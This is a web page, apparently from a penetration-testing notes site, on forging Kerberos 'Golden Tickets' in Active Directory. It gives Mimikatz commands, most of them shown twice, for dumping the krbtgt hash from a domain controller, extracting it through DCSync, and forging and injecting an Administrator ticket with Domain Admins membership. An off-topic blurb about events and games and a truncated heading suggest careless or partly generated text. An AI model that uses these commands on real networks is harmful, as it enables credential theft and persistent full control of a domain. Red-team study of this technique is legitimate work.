🔥Golden tickets

Explore our thorough article about Golden tickets, unlocking the mysteries behind this sought-after treasure in events and games. Dive into the golden opportunity now!

ump hashes - Get the krbtgt hash

Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername <computername>

Make golden ticket

Use /ticket instead of /ptt to save the ticket to file instead of loading in current powershell process To get the SID use Get-DomainSID from powerview

Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:<domain> /sid:<domain sid> /krbtgt:<hash> id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'

Use the DCSync feature for getting krbtgt hash. Execute with DA privileges

Invoke-Mimikatz -Command '"lsadump::dcsync /user:<domain>\krbtgt"'

Check WMI Permission

Get-wmiobject -Class win32_operatingsystem -ComputerName <computername>

Read All information about Golden Tickets - Theory and Practice

Commands: https://gitbook.ad-attacks.com/domain-persistence/golden-ticket

All About Active Directory Hacking

Golden Tickets Theory

Extract krbtgt hash using Mimikatz

To retrieve the krbtgt account hash which is essential for creating Golden Tickets, use the following command on a target machine with appropriate permissions:

Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername <computername>

Generating a Golden Ticket

After obtaining the necessary krbtgt hash and domain SID, a Golden Ticket can be created. The command below will generate and automatically pass the ticket to the session:

Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:<domain> /sid:<domain sid> /krbtgt:<hash> id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'

To save the ticket to a file instead of loading it into the current process, replace /ptt with /ticket.

Acquire krbtgt hash via DCSync

For users with Domain Administrator privileges, the krbtgt hash can also be obtained by simulating a Domain Controller synchronization process:

Invoke-Mimikatz -Command '"lsadump::dcsync /user:<domain>\krbtgt"'

Verify WMI Permissions

To check the Windows Management Instrumentation (WMI) permissions on a specific computer, use the following PowerShell command:

Get-wmiobject -Class win32_operatingsystem -ComputerName <computername>

Understanding Golden Tickets

Deepening your knowledge of Active Directory attacks, specifically Golden Tickets, is crucial. Study the theory and practice through the resource provided below:

Active Directory Hacking Guide
Golden Ticket Concepts
Detailed Commands: AD Attacks GitBook

Sources

Kerberos: Golden Tickets | Red Team Notesired.team

PreviousCrackMapExec NextSilver Tickets

Last updated 1 year ago

hashtagump hashes - Get the krbtgt hash

hashtagMake golden ticket

hashtagUse the DCSync feature for getting krbtgt hash. Execute with DA privileges

hashtagCheck WMI Permission

hashtagRead All information about Golden Tickets - Theory and Practice

hashtagExtract krbtgt hash using Mimikatz

hashtagGenerating a Golden Ticket

hashtagAcquire krbtgt hash via DCSync

hashtagVerify WMI Permissions

hashtagUnderstanding Golden Tickets

hashtagSources